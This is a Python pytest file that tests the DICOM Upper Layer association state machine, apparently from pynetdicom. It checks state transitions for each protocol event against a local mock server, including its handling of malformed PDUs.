@pytest.mark.parametrize("event, states", REFERENCE_BAD_EVENTS)
def test_invalid_action_raises(self, event, states):
"""Test StateMachine.do_action raises exception if action invalid."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
for state in states:
state = "Sta{}".format(state)
fsm.current_state = state
msg = msg = (
r"Invalid event '{}' for the current state '{}'"
.format(event, state)
)
with pytest.raises(InvalidEventError, match=msg):
fsm.do_action(event)
@pytest.mark.parametrize("event, states", REFERENCE_GOOD_EVENTS)
def test_exception_during_action(self, event, states):
"""Test an exception raised during an action kill the DUL."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
fsm.dul = BadDUL()
for state in states:
fsm.dul.is_killed = False
state = "Sta{}".format(state)
fsm.current_state = state
with pytest.raises(AttributeError):
fsm.do_action(event)
assert fsm.dul.is_killed is True
assert fsm.current_state == state
class TestStateBase:
"""Base class for State tests."""
def setup(self):
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
assoc.set_socket(AssociationSocket(assoc))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = validate_ae_title(b'ANY_SCU')
assoc.acceptor.address = 'localhost'
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = ''
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = (
ae.implementation_class_uid
)
assoc.requestor.implementation_version_name = (
ae.implementation_version_name
)
cx = build_context(VerificationSOPClass)
cx.context_id = 1
assoc.requestor.requested_contexts = [cx]
self.assoc = assoc
self.fsm = self.monkey_patch(assoc.dul.state_machine)
self.scp = None
def teardown(self):
if self.scp:
for commands in self.scp.commands:
self.scp.step()
#self.scp.commands = [('exit', None)]
#self.scp.step()
self.scp.shutdown()
def get_associate(self, assoc_type):
primitive = A_ASSOCIATE()
if assoc_type == 'request':
primitive.application_context_name = '1.2.3.4.5.6'
# Calling AE Title is the source DICOM AE title
primitive.calling_ae_title = b'LOCAL_AE_TITLE '
# Called AE Title is the destination DICOM AE title
primitive.called_ae_title = b'REMOTE_AE_TITLE '
# The TCP/IP address of the source, pynetdicom includes port too
primitive.calling_presentation_address = ('', 0)
# The TCP/IP address of the destination, pynetdicom includes port too
primitive.called_presentation_address = ('localhost', 11112)
# Proposed presentation contexts
cx = build_context(VerificationSOPClass)
cx.context_id = 1
primitive.presentation_context_definition_list = [cx]
user_info = []
item = MaximumLengthNotification()
item.maximum_length_received = 16382
user_info.append(item)
item = ImplementationClassUIDNotification()
item.implementation_class_uid = '1.2.3.4'
user_info.append(item)
primitive.user_information = user_info
elif assoc_type == 'accept':
primitive.application_context_name = '1.2.3.4.5.6'
# Calling AE Title is the source DICOM AE title
primitive.calling_ae_title = b'LOCAL_AE_TITLE '
# Called AE Title is the destination DICOM AE title
primitive.called_ae_title = b'REMOTE_AE_TITLE '
# The TCP/IP address of the source, pynetdicom includes port too
primitive.result = 0x00
primitive.result_source = 0x01
# Proposed presentation contexts
cx = build_context(VerificationSOPClass)
cx.context_id = 1
primitive.presentation_context_definition_results_list = [cx]
user_info = []
item = MaximumLengthNotification()
item.maximum_length_received = 16383
user_info.append(item)
item = ImplementationClassUIDNotification()
item.implementation_class_uid = '1.2.3.4.5'
user_info.append(item)
primitive.user_information = user_info
elif assoc_type == 'reject':
primitive.result = 0x01
primitive.result_source = 0x01
primitive.diagnostic = 0x01
return primitive
def get_release(self, is_response=False):
primitive = A_RELEASE()
if is_response:
primitive.result = 'affirmative'
return primitive
def get_abort(self, is_ap=False):
if is_ap:
primitive = A_P_ABORT()
primitive.provider_reason = 0x00
else:
primitive = A_ABORT()
primitive.abort_source = 0x00
return primitive
def get_pdata(self):
item = [1, p_data_tf[10:]]
primitive = P_DATA()
primitive.presentation_data_value_list.append(item)
return primitive
def monkey_patch(self, fsm):
"""Monkey patch the StateMachine to add testing hooks."""
# Record all state transitions
fsm._transitions = []
fsm.original_transition = fsm.transition
def transition(state):
fsm._transitions.append(state)
fsm.original_transition(state)
fsm.transition = transition
# Record all event/state/actions
fsm._changes = []
fsm._events = []
fsm.original_action = fsm.do_action
def do_action(event):
fsm._events.append(event)
if (event, fsm.current_state) in TRANSITION_TABLE:
action_name = TRANSITION_TABLE[(event, fsm.current_state)]
fsm._changes.append((fsm.current_state, event, action_name))
fsm.original_action(event)
fsm.do_action = do_action
return fsm
def start_server(self, commands):
"""Start the receiving server."""
server = ThreadedParrot(('localhost', 11112), commands)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
return server
def print_fsm_scp(self, fsm, scp=None):
"""Print out some of the quantities we're interested in."""
print('Transitions', fsm._transitions)
print('Changes')
for change in fsm._changes:
print('\t{}'.format(change))
print('Events', fsm._events)
if scp and scp.handlers:
print('Received', scp.handlers[0].received)
print('Sent', scp.handlers[0].sent)
def get_acceptor_assoc(self):
# AF_INET: IPv4, SOCK_STREAM: TCP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(
socket.SOL_SOCKET,
socket.SO_RCVTIMEO,
pack('ll', 1, 0)
)
sock.connect(('localhost', 11112))
ae = AE()
ae.add_supported_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='acceptor')
assoc.set_socket(AssociationSocket(assoc, client_socket=sock))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = validate_ae_title(b'ANY_SCU')
assoc.acceptor.address = 'localhost'
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = ''
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = (
ae.implementation_class_uid
)
assoc.requestor.implementation_version_name = (
ae.implementation_version_name
)
cx = build_context(VerificationSOPClass)
cx.context_id = 1
assoc.acceptor.supported_contexts = [cx]
fsm = self.monkey_patch(assoc.dul.state_machine)
return assoc, fsm
def wait_on_state(self, fsm, state, timeout=5):
start = 0
while fsm.current_state != state and start < timeout:
time.sleep(0.05)
start += 0.05
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState01(TestStateBase):
"""Tests for State 01: Idle."""
def move_to_state(self, assoc, scp):
assoc.start()
self.wait_on_state(assoc.dul.state_machine, 'Sta1')
def test_evt01(self):
"""Test Sta1 + Evt1."""
# Sta1 + Evt1 -> AE-1 -> Sta4
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
# AE-1: Issue TRANSPORT_CONNECT primitive to <transport service>
commands = [
('recv', None),
('send', a_abort),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:1] == ['Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta1 + Evt2."""
# Sta1 + Evt2 -> <ignore> -> Sta1
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta1 + Evt3."""
# Sta1 + Evt3 -> <ignore> -> Sta1
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
commands = [
('send', a_associate_ac),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ['Evt3']
def test_evt04(self):
"""Test Sta1 + Evt4."""
# Sta1 + Evt4 -> <ignore> -> Sta1
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
commands = [
('send', a_associate_rj),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ['Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta1 + Evt5."""
# Sta1 + Evt5 -> AE-5 -> Sta2
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
# AE-5: Issue TRANSPORT_RESPONSE to <transport service>
# Start ARTIM timer
pass
def test_evt06(self):
"""Test Sta1 + Evt6."""
# Sta1 + Evt6 -> <ignore> -> Sta1
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
commands = [
('send', a_associate_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ['Evt6']
def test_evt07(self):
"""Test Sta1 + Evt7."""
# Sta1 + Evt7 -> <ignore> -> Sta1
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.5)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt7'
def test_evt08(self):
"""Test Sta1 + Evt8."""
# Sta1 + Evt8 -> <ignore> -> Sta1
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.5)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt8'
assert self.fsm.current_state == 'Sta1'
def test_evt09(self):
"""Test Sta1 + Evt9."""
# Sta1 + Evt9 -> <ignore> -> Sta1
# Evt9: Receive P-DATA primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.5)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt9'
assert self.fsm.current_state == 'Sta1'
def test_evt10(self):
"""Test Sta1 + Evt10."""
# Sta1 + Evt10 -> <ignore> -> Sta1
# Evt10: Receive P-DATA-TF PDU from <remote>
commands = [
('send', p_data_tf),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ['Evt10']
def test_evt11(self):
"""Test Sta1 + Evt11."""
# Sta1 + Evt11 -> <ignore> -> Sta1
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.5)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt11'
assert self.fsm.current_state == 'Sta1'
def test_evt12(self):
"""Test Sta1 + Evt12."""
# Sta1 + Evt12 -> <ignore> -> Sta1
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
commands = [
('send', a_release_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ['Evt12']
def test_evt13(self):
"""Test Sta1 + Evt13."""
# Sta1 + Evt13 -> <ignore> -> Sta1
# Evt13: Receive A-RELEASE-RP PDU from <remote>
commands = [
('send', a_release_rp),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ['Evt13']
def test_evt14(self):
"""Test Sta1 + Evt14."""
# Sta1 + Evt14 -> <ignore> -> Sta1
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.5)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt14'
assert self.fsm.current_state == 'Sta1'
def test_evt15(self):
"""Test Sta1 + Evt15."""
# Sta1 + Evt15 -> <ignore> -> Sta1
# Evt15: Receive A-ABORT (rq) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_abort(False))
time.sleep(0.5)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt15'
assert self.fsm.current_state == 'Sta1'
def test_evt16(self):
"""Test Sta1 + Evt16."""
# Sta1 + Evt16 -> <ignore> -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
commands = [
('send', a_abort),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ['Evt16']
def test_evt17(self):
"""Test Sta1 + Evt17."""
# Sta1 + Evt17 -> <ignore> -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.shutdown()
time.sleep(0.5)
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ['Evt17']
def test_evt18(self):
"""Test Sta1 + Evt18."""
# Sta1 + Evt18 -> <ignore> -> Sta1
# Evt18: ARTIM timer expired from <local service>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.5)
self.assoc.kill()
assert self.assoc.dul.artim_timer.expired
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt18'
assert self.fsm.current_state == 'Sta1'
def test_evt19(self):
"""Test Sta1 + Evt19."""
# Sta1 + Evt19 -> <ignore> -> Sta1
# Evt19: Received unrecognised or invalid PDU from <remote>
commands = [
('send', b'\x08\x00\x00\x00\x00\x00\x00'),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ['Evt19']
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState02(TestStateBase):
"""Tests for State 02: Connection open, waiting for A-ASSOCIATE-RQ."""
def move_to_state(self, assoc, scp):
assoc.start()
self.wait_on_state(assoc.dul.state_machine, 'Sta2')
def test_evt01(self):
"""Test Sta2 + Evt1."""
# Sta2 + Evt1 -> <ignore> -> Sta2
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate('request'))
scp.step()
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta2 + Evt2."""
# Sta2 + Evt2 -> <ignore> -> Sta2
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta2 + Evt3."""
# Sta2 + Evt3 -> AA-1 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', a_associate_ac),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt3', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt3']
def test_evt04(self):
"""Test Sta2 + Evt4."""
# Sta2 + Evt4 -> AA-1 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', a_associate_rj),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt4', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta2 + Evt5."""
# Sta2 + Evt5 -> <ignore> -> Sta2
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06a(self):
"""Test Sta2 + Evt6."""
# Sta2 + Evt6 -> AE-6 -> **Sta3** or Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AE-6: Stop ARTIM, issue A-ASSOCIATE or A-ASSOCIATE-RJ PDU
commands = [
('send', a_associate_rq),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6')
]
assert fsm._events[:2] == ['Evt5', 'Evt6']
def test_evt06b(self):
"""Test Sta2 + Evt6."""
# Sta2 + Evt6 -> AE-6 -> Sta3 or **Sta13**
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AE-6: Stop ARTIM, issue A-ASSOCIATE or A-ASSOCIATE-RJ PDU
bad_request = a_associate_rq[:6] + b'\x00\x02' + a_associate_rq[8:]
assert len(bad_request) == len(a_associate_rq)
commands = [
('send', bad_request),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6')
]
assert fsm._events[:2] == ['Evt5', 'Evt6']
def test_evt07(self):
"""Test Sta2 + Evt7."""
# Sta2 + Evt7 -> <ignore> -> Sta2
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate('accept'))
scp.step()
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt7']
def test_evt08(self):
"""Test Sta2 + Evt8."""
# Sta2 + Evt8 -> <ignore> -> Sta2
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate('reject'))
scp.step()
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt8']
def test_evt09(self):
"""Test Sta2 + Evt9."""
# Sta2 + Evt9 -> <ignore> -> Sta2
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt9']
def test_evt10(self):
"""Test Sta2 + Evt10."""
# Sta2 + Evt10 -> AA-1 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', p_data_tf),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt10', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt10']
def test_evt11(self):
"""Test Sta2 + Evt11."""
# Sta2 + Evt11 -> <ignore> -> Sta2
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt11']
def test_evt12(self):
"""Test Sta2 + Evt12."""
# Sta2 + Evt12 -> AA-1 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', a_release_rq),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt12', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt12']
def test_evt13(self):
"""Test Sta2 + Evt13."""
# Sta2 + Evt13 -> AA-1 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', a_release_rp),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt13', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt13']
def test_evt14(self):
"""Test Sta2 + Evt14."""
# Sta2 + Evt14 -> <ignore> -> Sta2
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt14']
def test_evt15(self):
"""Test Sta2 + Evt15."""
# Sta2 + Evt15 -> <ignore> -> Sta2
# Evt15: Receive A-ABORT (rq) primitive from <local user>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt15']
def test_evt16(self):
"""Test Sta2 + Evt16."""
# Sta2 + Evt16 -> AA-2 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-2: Stop ARTIM, close connection
commands = [
('send', a_abort),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta1']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt16', 'AA-2')
]
assert fsm._events[:2] == ['Evt5', 'Evt16']
def test_evt17(self):
"""Test Sta2 + Evt17."""
# Sta2 + Evt17 -> AA-5 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-5: Stop ARTIM timer
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert fsm._transitions[:2] == ['Sta2', 'Sta1']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt17', 'AA-5')
]
assert fsm._events[:2] == ['Evt5', 'Evt17']
def test_evt18(self):
"""Test Sta2 + Evt18."""
# Sta2 + Evt18 -> AA-2 -> Sta1
# Evt18: ARTIM timer expired from <local service>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.artim_timer.timeout = 0.05
assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt18']
def test_evt19(self):
"""Test Sta2 + Evt19."""
# Sta2 + Evt19 -> AA-1 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt19', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt19']
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState03(TestStateBase):
"""Tests for State 03: Awaiting A-ASSOCIATE (rsp) primitive."""
def move_to_state(self, assoc, scp):
assoc.start()
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta3')
def test_evt01(self):
"""Test Sta3 + Evt1."""
# Sta3 + Evt1 -> <ignore> -> Sta3
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('send', a_associate_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
pass
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate('request'))
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta3 + Evt2."""
# Sta3 + Evt2 -> <ignore> -> Sta3
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta3 + Evt3."""
# Sta3 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('send', a_associate_ac),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
pass
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.shutdown()
